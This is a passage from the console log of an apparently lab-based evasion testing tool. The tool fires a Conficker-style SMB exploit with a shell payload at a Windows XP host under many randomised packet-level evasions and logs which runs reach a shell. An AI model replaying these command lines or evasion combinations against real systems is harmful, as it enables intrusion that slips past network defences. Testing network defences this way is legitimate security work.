  1153. The following evasions are applied from stage smb_connect to msrpc_req:
  1154. - Before normal SMB writes, 4 SMB trees are opened and 3 writes are performed to them. The write payload is 1723 bytes of MSRPC request-like data.
  1155.  
  1156. Info: NetBIOS connection 10.62.90.111:31846 -> 10.35.1.207:445
  1157. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1158. Info: Sending MSRPC request with exploit
  1159. Info: Shell found, attack succeeded
  1160. Info: CommandShell::SendCommand() - Failed to send string
  1161. Info: Command shell connection reset.
  1162. Info: Shell closed
  1163. 0: Success.
  1164. .
  1165. 1794 runs averaging 1.89 runs / second ; progress: 951/43200..................
  1166. 1812 runs averaging 1.90 runs / second ; progress: 956/43200.........
  1167. 1821 runs averaging 1.89 runs / second ; progress: 961/43200..2015-06-07 23:35:34 INFO
  1168. Success. (10.62.90.111):
  1169. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=54267 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=7y0JaWVYTKY --evasion=[start,smb_opentree]ipv4_opt,"13","inc","random_alphanum" --evasion=[smb_connect,end]tcp_paws,"5","124871207","alpharandomized" --verifydelay=1000 --payload=shell
  1170. Info: Using random seed 7y0JaWVYTKb
  1171. The following evasions are applied from stage start to smb_opentree:
  1172. - Every 13th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  1173. The duplicate packet has random alphanumeric bytes as payload
  1174. The following evasions are applied from stage smb_connect to end:
  1175. - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 124871207> and has original payload with alphabetic bytes randomized
  1176.  
  1177. Info: NetBIOS connection 10.62.90.111:54267 -> 10.35.1.207:445
  1178. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1179. Info: Sending MSRPC request with exploit
  1180. Info: Shell found, attack succeeded
  1181. Info: CommandShell::SendCommand() - Failed to send string
  1182. Info: Command shell connection reset.
  1183. Info: Shell closed
  1184. 0: Success.
  1185. ............
  1186. 1836 runs averaging 1.90 runs / second ; progress: 966/43200.........
  1187. 1845 runs averaging 1.90 runs / second ; progress: 971/43200...............
  1188. 1860 runs averaging 1.91 runs / second ; progress: 976/43200..2015-06-07 23:35:46 INFO
  1189. Success. (10.62.90.116):
  1190. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=53810 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=l+IKIQ4Qqwk --evasion=[msrpc_bind,end]tcp_chaff,"3","nullflag|shorthdr","alpharandomized" --evasion=[smb_connect,end]tcp_paws,"50%","268435455","alpharandomized" --verifydelay=1000 --payload=shell
  1191. Info: Using random seed l+IKIQ4Qqwm
  1192. The following evasions are applied from stage smb_connect to end:
  1193. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has original payload with alphabetic bytes randomized
  1194. The following evasions are applied from stage msrpc_bind to end:
  1195. - With every 3 TCP packet a TCP chaff packet is sent. The chaff packet has:
  1196. * NULL TCP control flags.
  1197. * TCP header shorter than 20 bytes
  1198. * Duplicate packet has original payload with alphabetic bytes randomized
  1199.  
  1200. Info: NetBIOS connection 10.62.90.116:53810 -> 10.35.1.207:445
  1201. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1202. Info: Sending MSRPC request with exploit
  1203. Info: Shell found, attack succeeded
  1204. Info: Shell closed
  1205. 0: Success.
  1206. ...............
  1207. 1878 runs averaging 1.91 runs / second ; progress: 981/43200..2015-06-07 23:35:52 INFO
  1208. Success. (10.62.90.111):
  1209. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37059 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=p48gpM55008 --evasion=[netbios_connect,end]tcp_paws,"50%","70435613","random_alphanum" --evasion=[netbios_connect,smb_connect]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
  1210. Info: Using random seed p48gpM5500+
  1211. The following evasions are applied from stage netbios_connect to end:
  1212. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 70435613> and has random alphanumeric bytes as payload
  1213. The following evasions are applied from stage netbios_connect to smb_connect:
  1214. - TCP timestamps echo reply value is sent in the wrong endianness
  1215.  
  1216. Info: NetBIOS connection 10.62.90.111:37059 -> 10.35.1.207:445
  1217. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1218. Info: Sending MSRPC request with exploit
  1219. Info: Shell found, attack succeeded
  1220. Info: Shell closed
  1221. 0: Success.
  1222. ........
  1223. 1889 runs averaging 1.92 runs / second ; progress: 986/43200..........
  1224. 1899 runs averaging 1.92 runs / second ; progress: 991/43200.....
  1225. 1904 runs averaging 1.91 runs / second ; progress: 996/43200.......
  1226. 1911 runs averaging 1.91 runs / second ; progress: 1001/43200......Pid 7942 timed out - killed
  1227. 2015-06-07 23:36:14 INFO
  1228. Timed out (10.62.90.119):
  1229. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=38370 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=d/0qmv/Fmbo --evasion=[start,msrpc_req]ipv4_frag,"24" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"1","random" --verifydelay=1000 --payload=shell
  1230. Info: Using random seed d/0qmv/Fmbp
  1231. The following evasions are applied from stage start to msrpc_req:
  1232. - IPv4 fragments with at most 24 bytes per fragment
  1233. The following evasions are applied from stage smb_openpipe to msrpc_req:
  1234. - Add a random urgent data byte to every 1 TCP segment.
  1235.  
  1236. Info: NetBIOS connection 10.62.90.119:38370 -> 10.35.1.207:445
  1237. Terminated
  1238. ......
  1239. 1924 runs averaging 1.91 runs / second ; progress: 1006/43200............
  1240. 1936 runs averaging 1.91 runs / second ; progress: 1011/43200....................
  1241. 1956 runs averaging 1.92 runs / second ; progress: 1016/43200................
  1242. 1972 runs averaging 1.93 runs / second ; progress: 1021/43200.....
  1243. 1977 runs averaging 1.93 runs / second ; progress: 1026/43200
  1244. 1977 runs averaging 1.92 runs / second ; progress: 1031/43200.......
  1245. 1984 runs averaging 1.91 runs / second ; progress: 1036/43200.........2015-06-07 23:36:50 INFO
  1246. Success. (10.62.90.112):
  1247. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=16837 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=t66PqlwjdXo --evasion=[smb_openpipe,msrpc_bind]netbios_chaff,"75%","http_get|http_post|msrpc_req|broken_length" --evasion=[smb_opentree,msrpc_req]smb_decoytrees,"5","4","3","random_msrpcreq" --evasion=[smb_opentree,smb_openpipe]tcp_overlap,"1479","new","random_alphanum" --verifydelay=1000 --payload=shell
  1248. Info: Using random seed t66PqlwjdXq
  1249. The following evasions are applied from stage smb_opentree to smb_openpipe:
  1250. - TCP segments are set to overlap by 1479 bytes, with the later packet containing the correct payload. Overlapping part has random alphanumeric bytes as payload
  1251. The following evasions are applied from stage smb_opentree to msrpc_req:
  1252. - Before normal SMB writes, 5 SMB trees are opened and 4 writes are performed to them. The write payload is 3 bytes of MSRPC request-like data.
  1253. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  1254. - 75% probability to send a chaff NetBIOS message before an actual NetBIOS message. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
  1255.  
  1256. Info: NetBIOS connection 10.62.90.112:16837 -> 10.35.1.207:445
  1257. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1258. Info: Sending MSRPC request with exploit
  1259. Info: Shell found, attack succeeded
  1260. Info: CommandShell::SendCommand() - Failed to send string
  1261. Info: Command shell connection reset.
  1262. Info: Shell closed
  1263. 0: Success.
  1264. ......Pid 8470 timed out - killed
  1265. 2015-06-07 23:36:51 INFO
  1266. Timed out (10.62.90.114):
  1267. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=28648 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=rzrWoJOMQXg --evasion=[netbios_connect,end]ipv4_opt,"13","inc","alpharandomized" --evasion=[start,msrpc_req]tcp_chaff,"50%","nullflag|shorthdr","alphanumrandomized" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","random_alpha" --verifydelay=1000 --payload=shell
  1268. Info: Using random seed rzrWoJOMQXi
  1269. The following evasions are applied from stage start to msrpc_req:
  1270. - 50% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
  1271. * NULL TCP control flags.
  1272. * TCP header shorter than 20 bytes
  1273. * Duplicate packet has original payload with alphanumeric bytes randomized
  1274. The following evasions are applied from stage netbios_connect to end:
  1275. - Every 13th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  1276. The duplicate packet has identical payload except that alphabetic characters are randomized
  1277. The following evasions are applied from stage smb_opentree to msrpc_bind:
  1278. - Add a random alphaurgent data byte to every 2 TCP segment.
  1279.  
  1280. Info: NetBIOS connection 10.62.90.114:28648 -> 10.35.1.207:445
  1281. Terminated
  1282. .
  1283. 2002 runs averaging 1.92 runs / second ; progress: 1042/43200.........................
  1284. 2027 runs averaging 1.94 runs / second ; progress: 1047/43200.....................
  1285. 2048 runs averaging 1.95 runs / second ; progress: 1052/43200...............
  1286. 2063 runs averaging 1.95 runs / second ; progress: 1057/43200.2015-06-07 23:37:07 INFO
  1287. Success. (10.62.90.112):
  1288. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=57745 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=bYq5ipjquv8 --evasion=[smb_opentree,end]tcp_overlap,"6","new","random" --evasion=[netbios_connect,msrpc_req]tcp_paws,"75%","112523422","random_alpha" --verifydelay=1000 --payload=shell
  1289. Info: Using random seed bYq5ipjquv9
  1290. The following evasions are applied from stage netbios_connect to msrpc_req:
  1291. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 112523422> and has random alpha bytes as payload
  1292. The following evasions are applied from stage smb_opentree to end:
  1293. - TCP segments are set to overlap by 6 bytes, with the later packet containing the correct payload. Overlapping part has random bytes as payload
  1294.  
  1295. Info: NetBIOS connection 10.62.90.112:57745 -> 10.35.1.207:445
  1296. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1297. Info: Sending MSRPC request with exploit
  1298. Info: Shell found, attack succeeded
  1299. Info: CommandShell::SendCommand() - Failed to send string
  1300. Info: Command shell connection reset.
  1301. Info: Shell closed
  1302. 0: Success.
  1303. ........
  1304. 2073 runs averaging 1.95 runs / second ; progress: 1062/43200...
  1305. 2076 runs averaging 1.95 runs / second ; progress: 1067/43200...Pid 8907 timed out - killed
  1306. 2015-06-07 23:37:18 INFO
  1307. Timed out (10.62.90.115):
  1308. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=21523 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=q/iYCznwOBM --evasion=[netbios_connect,msrpc_req]ipv4_frag,"352" --evasion=[smb_opentree,end]tcp_urgent,"2","zero" --verifydelay=1000 --payload=shell
  1309. Info: Using random seed q/iYCznwOBO
  1310. The following evasions are applied from stage netbios_connect to msrpc_req:
  1311. - IPv4 fragments with at most 352 bytes per fragment
  1312. The following evasions are applied from stage smb_opentree to end:
  1313. - Add a zero urgent data byte to every 2 TCP segment.
  1314.  
  1315. Info: NetBIOS connection 10.62.90.115:21523 -> 10.35.1.207:445
  1316. Terminated
  1317. ........
  1318. 2088 runs averaging 1.95 runs / second ; progress: 1072/43200.................
  1319. 2105 runs averaging 1.95 runs / second ; progress: 1077/43200..2015-06-07 23:37:28 INFO
  1320. Success. (10.62.90.112):
  1321. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=39608 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=kCPetdTqU9U --evasion=[netbios_connect,msrpc_req]tcp_chaff,"13","nullchksum|nullflag|shorthdr","random" --evasion=[smb_opentree,end]tcp_paws,"3","8","random_alpha" --evasion=[smb_connect,smb_openpipe]tcp_segvar,"9","54646" --verifydelay=1000 --payload=shell
  1322. Info: Using random seed kCPetdTqU9W
  1323. The following evasions are applied from stage netbios_connect to msrpc_req:
  1324. - With every 13 TCP packet a TCP chaff packet is sent. The chaff packet has:
  1325. * NULL TCP checksum.
  1326. * NULL TCP control flags.
  1327. * TCP header shorter than 20 bytes
  1328. * Duplicate packet has random bytes as payload
  1329. The following evasions are applied from stage smb_connect to smb_openpipe:
  1330. - TCP packets are segmented to contain between 9 and 54646 bytes of payload.
  1331. The following evasions are applied from stage smb_opentree to end:
  1332. - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has random alpha bytes as payload
  1333.  
  1334. Info: NetBIOS connection 10.62.90.112:39608 -> 10.35.1.207:445
  1335. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1336. Info: Sending MSRPC request with exploit
  1337. Info: Shell found, attack succeeded
  1338. Info: Shell closed
  1339. 0: Success.
  1340. ................
  1341. 2124 runs averaging 1.96 runs / second ; progress: 1082/43200.......................
  1342. 2148 runs averaging 1.98 runs / second ; progress: 1087/43200..............Pid 9118 timed out - killed
  1343. 2015-06-07 23:37:41 INFO
  1344. Timed out (10.62.90.113):
  1345. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=42217 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=aB2TLnwEBs0 --evasion=[netbios_connect,smb_openpipe]tcp_paws,"75%","35527006","random" --evasion=[smb_opentree,msrpc_bind]tcp_paws,"1","6","shuffle30" --verifydelay=1000 --payload=shell
  1346. Info: Using random seed aB2TLnwEBs1
  1347. The following evasions are applied from stage netbios_connect to smb_openpipe:
  1348. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 35527006> and has random bytes as payload
  1349. The following evasions are applied from stage smb_opentree to msrpc_bind:
  1350. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has 30 bytes of original payload, then shuffled original payload
  1351.  
  1352. Info: NetBIOS connection 10.62.90.113:42217 -> 10.35.1.207:445
  1353. Terminated
  1354. ..
  1355. 2164 runs averaging 1.98 runs / second ; progress: 1092/43200..................
  1356. 2182 runs averaging 1.99 runs / second ; progress: 1097/43200................
  1357. 2198 runs averaging 1.99 runs / second ; progress: 1102/43200.........2015-06-07 23:37:56 INFO
  1358. Success. (10.62.90.119):
  1359. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=40371 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=fn25dE4h1gs --evasion=[start,smb_opentree]ipv4_frag,"1440" --evasion=[smb_connect,smb_openpipe]ipv4_order,"rev" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"1","163937280","zero" --verifydelay=1000 --payload=shell
  1360. Info: Using random seed fn25dE4h1gt
  1361. The following evasions are applied from stage start to smb_opentree:
  1362. - IPv4 fragments with at most 1440 bytes per fragment
  1363. The following evasions are applied from stage smb_connect to smb_openpipe:
  1364. - IPv4 fragments are sent in a reverse order
  1365. The following evasions are applied from stage smb_openpipe to msrpc_req:
  1366. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 163937280> and has 0x00 bytes as payload
  1367.  
  1368. Info: NetBIOS connection 10.62.90.119:40371 -> 10.35.1.207:445
  1369. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1370. Info: Sending MSRPC request with exploit
  1371. Info: Shell found, attack succeeded
  1372. Info: Shell closed
  1373. 0: Success.
  1374. .
  1375. 2209 runs averaging 2.00 runs / second ; progress: 1107/43200.........
  1376. 2218 runs averaging 1.99 runs / second ; progress: 1112/43200................
  1377. 2234 runs averaging 2.00 runs / second ; progress: 1117/43200................
  1378. 2250 runs averaging 2.01 runs / second ; progress: 1122/43200.......2015-06-07 23:38:15 INFO
  1379. Success. (10.62.90.110):
  1380. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=14671 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=eos8HvXZetA --evasion=[smb_connect,msrpc_req]smb_decoytrees,"4","3","10","random" --evasion=[start,msrpc_req]tcp_paws,"1","43471621","alphanumrandomized" --evasion=[smb_opentree,smb_openpipe]tcp_paws,"50%","7","alpharandomized" --verifydelay=1000 --payload=shell
  1381. Info: Using random seed eos8HvXZetB
  1382. The following evasions are applied from stage start to msrpc_req:
  1383. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 43471621> and has original payload with alphanumeric bytes randomized
  1384. The following evasions are applied from stage smb_connect to msrpc_req:
  1385. - Before normal SMB writes, 4 SMB trees are opened and 3 writes are performed to them. The write payload is 10 random bytes.
  1386. The following evasions are applied from stage smb_opentree to smb_openpipe:
  1387. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 7> and has original payload with alphabetic bytes randomized
  1388.  
  1389. Info: NetBIOS connection 10.62.90.110:14671 -> 10.35.1.207:445
  1390. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1391. Info: Sending MSRPC request with exploit
  1392. Info: Shell found, attack succeeded
  1393. Info: CommandShell::SendCommand() - Failed to send string
  1394. Info: Command shell connection reset.
  1395. Info: Shell closed
  1396. 0: Success.
  1397. ..
  1398. 2260 runs averaging 2.01 runs / second ; progress: 1127/43200........
  1399. 2268 runs averaging 2.00 runs / second ; progress: 1132/43200.............
  1400. 2281 runs averaging 2.01 runs / second ; progress: 1137/43200........2015-06-07 23:38:29 INFO
  1401. Success. (10.62.90.112):
  1402. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=64670 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=nUqmYkZuLXg --evasion=[msrpc_req,end]smb_decoytrees,"6","3","2","random_msrpcreq" --evasion=[netbios_connect,smb_connect]tcp_urgent,"50%","zero" --verifydelay=1000 --payload=shell
  1403. Info: Using random seed nUqmYkZuLXi
  1404. The following evasions are applied from stage netbios_connect to smb_connect:
  1405. - 50% probability to add a zero urgent data byte to a TCP segment.
  1406. The following evasions are applied from stage msrpc_req to end:
  1407. - Before normal SMB writes, 6 SMB trees are opened and 3 writes are performed to them. The write payload is 2 bytes of MSRPC request-like data.
  1408.  
  1409. Info: NetBIOS connection 10.62.90.112:64670 -> 10.35.1.207:445
  1410. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1411. Info: Sending MSRPC request with exploit
  1412. Info: Shell found, attack succeeded
  1413. Info: Command shell connection reset.
  1414. Info: CommandShell::SendCommand() - Failed to send string
  1415. Info: Shell closed
  1416. 0: Success.
  1417. ..............
  1418. 2304 runs averaging 2.02 runs / second ; progress: 1142/43200..................
  1419. 2322 runs averaging 2.02 runs / second ; progress: 1147/43200........Pid 9675 timed out - killed
  1420. 2015-06-07 23:38:41 INFO
  1421. Timed out (10.62.90.117):
  1422. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=38925 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=yG4ULddpIlQ --evasion=[netbios_connect,msrpc_req]tcp_chaff,"50%","nullflag|outofwindow|shorthdr","shuffle" --evasion=[smb_connect,msrpc_bind]tcp_paws,"13","1","alphanumrandomized" --evasion=[smb_opentree,end]tcp_urgent,"25%","random_alphanum" --verifydelay=1000 --payload=shell
  1423. Info: Using random seed yG4ULddpIlT
  1424. The following evasions are applied from stage netbios_connect to msrpc_req:
  1425. - 50% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
  1426. * NULL TCP control flags.
  1427. * An out-of-window sequence number.
  1428. * TCP header shorter than 20 bytes
  1429. * Duplicate packet has shuffled original payload
  1430. The following evasions are applied from stage smb_connect to msrpc_bind:
  1431. - Every 13th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 1> and has original payload with alphanumeric bytes randomized
  1432. The following evasions are applied from stage smb_opentree to end:
  1433. - 25% probability to add a random alphanumeric urgent data byte to a TCP segment.
  1434.  
  1435. Info: NetBIOS connection 10.62.90.117:38925 -> 10.35.1.207:445
  1436. Terminated
  1437. ...
  1438. 2334 runs averaging 2.03 runs / second ; progress: 1152/43200..................
  1439. 2352 runs averaging 2.03 runs / second ; progress: 1157/43200.....................
  1440. 2373 runs averaging 2.04 runs / second ; progress: 1162/43200.......2015-06-07 23:38:55 INFO
  1441. Success. (10.62.90.113):
  1442. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=36257 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=5grPrOpE19A --evasion=[smb_openpipe,end]ipv4_opt,"25%","inc","zero" --evasion=[start,end]tcp_paws,"3","8","random" --verifydelay=1000 --payload=shell
  1443. Info: Using random seed 5grPrOpE19D
  1444. - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has random bytes as payload
  1445. The following evasions are applied from stage smb_openpipe to end:
  1446. - 25% probability to send a duplicate IPv4 packet with an incrementing DWORD in the options field.
  1447. The duplicate packet has NULL bytes for payload
  1448.  
  1449. Info: NetBIOS connection 10.62.90.113:36257 -> 10.35.1.207:445
  1450. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1451. Info: Sending MSRPC request with exploit
  1452. Info: Shell found, attack succeeded
  1453. Info: CommandShell::SendCommand() - Failed to send string
  1454. Info: Command shell connection reset.
  1455. Info: Shell closed
  1456. 0: Success.
  1457. ..........
  1458. 2391 runs averaging 2.05 runs / second ; progress: 1167/43200................
  1459. 2407 runs averaging 2.05 runs / second ; progress: 1172/43200.............
  1460. 2420 runs averaging 2.06 runs / second ; progress: 1178/43200.....
  1461. 2425 runs averaging 2.05 runs / second ; progress: 1183/43200.
  1462. 2426 runs averaging 2.04 runs / second ; progress: 1188/43200........
  1463. 2434 runs averaging 2.04 runs / second ; progress: 1193/43200...............
  1464. 2449 runs averaging 2.04 runs / second ; progress: 1198/43200...................
  1465. 2468 runs averaging 2.05 runs / second ; progress: 1203/43200.....
  1466. 2473 runs averaging 2.05 runs / second ; progress: 1208/43200....
  1467. 2477 runs averaging 2.04 runs / second ; progress: 1213/43200....
  1468. 2481 runs averaging 2.04 runs / second ; progress: 1218/43200.............
  1469. 2494 runs averaging 2.04 runs / second ; progress: 1223/43200.......
  1470. 2501 runs averaging 2.04 runs / second ; progress: 1228/43200.....
  1471. 2506 runs averaging 2.03 runs / second ; progress: 1233/43200.........
  1472. 2515 runs averaging 2.03 runs / second ; progress: 1238/43200...............
  1473. 2530 runs averaging 2.04 runs / second ; progress: 1243/43200.............
  1474. 2543 runs averaging 2.04 runs / second ; progress: 1248/43200...........
  1475. 2554 runs averaging 2.04 runs / second ; progress: 1253/43200.........
  1476. 2563 runs averaging 2.04 runs / second ; progress: 1258/43200.....
  1477. 2568 runs averaging 2.03 runs / second ; progress: 1263/43200.....
  1478. 2573 runs averaging 2.03 runs / second ; progress: 1268/43200............
  1479. 2585 runs averaging 2.03 runs / second ; progress: 1273/43200........
  1480. 2593 runs averaging 2.03 runs / second ; progress: 1278/43200...Pid 12315 timed out - killed
  1481. 2015-06-07 23:40:49 INFO
  1482. Timed out (10.62.90.118):
  1483. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=10694 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=BVbxr7AH3E8 --evasion=[smb_openpipe,msrpc_bind]tcp_paws,"75%","1","random" --evasion=[smb_connect,smb_opentree]tcp_urgent,"5","random_alphanum" --verifydelay=1000 --payload=shell
  1484. Info: Using random seed BVbxr7AH3E8
  1485. The following evasions are applied from stage smb_connect to smb_opentree:
  1486. - Add a random alphanumeric urgent data byte to every 5 TCP segment.
  1487. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  1488. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 1> and has random bytes as payload
  1489.  
  1490. Info: NetBIOS connection 10.62.90.118:10694 -> 10.35.1.207:445
  1491. Terminated
  1492. ...........
  1493. 2608 runs averaging 2.03 runs / second ; progress: 1283/43200........
  1494. 2616 runs averaging 2.03 runs / second ; progress: 1288/43200..........
  1495. 2626 runs averaging 2.03 runs / second ; progress: 1293/43200...........
  1496. 2637 runs averaging 2.03 runs / second ; progress: 1298/432002015-06-07 23:41:08 INFO
  1497. Success. (10.62.90.119):
  1498. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=45516 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=b8YdQvqqZmM --evasion=[msrpc_bind,end]ipv4_frag,"336" --evasion=[smb_connect,end]ipv4_order,"lastfirst" --evasion=[smb_opentree,smb_openpipe]tcp_paws,"1","8","shuffle30" --verifydelay=1000 --payload=shell
  1499. Info: Using random seed b8YdQvqqZmN
  1500. The following evasions are applied from stage smb_connect to end:
  1501. - IPv4 fragments are sent in correct order except that the last fragment comes first
  1502. The following evasions are applied from stage smb_opentree to smb_openpipe:
  1503. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has 30 bytes of original payload, then shuffled original payload
  1504. The following evasions are applied from stage msrpc_bind to end:
  1505. - IPv4 fragments with at most 336 bytes per fragment
  1506.  
  1507. Info: NetBIOS connection 10.62.90.119:45516 -> 10.35.1.207:445
  1508. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1509. Info: Sending MSRPC request with exploit
  1510. Info: Shell found, attack succeeded
  1511. Info: Shell closed
  1512. 0: Success.
  1513. ............
  1514. 2650 runs averaging 2.03 runs / second ; progress: 1303/43200..............
  1515. 2664 runs averaging 2.04 runs / second ; progress: 1308/43200....Pid 12868 timed out - killed
  1516. 2015-06-07 23:41:19 INFO
  1517. Timed out (10.62.90.116):
  1518. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=40689 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=G4pa7GZ55rE --evasion=[netbios_connect,msrpc_bind]tcp_paws,"21","17100606","alpharandomized" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"1","random_alpha" --verifydelay=1000 --payload=shell
  1519. Info: Using random seed G4pa7GZ55rE
  1520. The following evasions are applied from stage netbios_connect to msrpc_bind:
  1521. - Every 21th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 17100606> and has original payload with alphabetic bytes randomized
  1522. The following evasions are applied from stage smb_openpipe to msrpc_req:
  1523. - Add a random alphaurgent data byte to every 1 TCP segment.
  1524.  
  1525. Info: NetBIOS connection 10.62.90.116:40689 -> 10.35.1.207:445
  1526. Terminated
  1527. .....................
  1528. 2690 runs averaging 2.05 runs / second ; progress: 1313/43200............................
  1529. 2718 runs averaging 2.06 runs / second ; progress: 1318/43200.....................
  1530. 2739 runs averaging 2.07 runs / second ; progress: 1323/43200............
  1531. 2751 runs averaging 2.07 runs / second ; progress: 1328/43200..........
  1532. 2761 runs averaging 2.07 runs / second ; progress: 1333/43200...........
  1533. 2772 runs averaging 2.07 runs / second ; progress: 1338/43200........
  1534. 2780 runs averaging 2.07 runs / second ; progress: 1344/43200.......
  1535. 2787 runs averaging 2.07 runs / second ; progress: 1349/43200....2015-06-07 23:42:02 INFO
  1536. Success. (10.62.90.116):
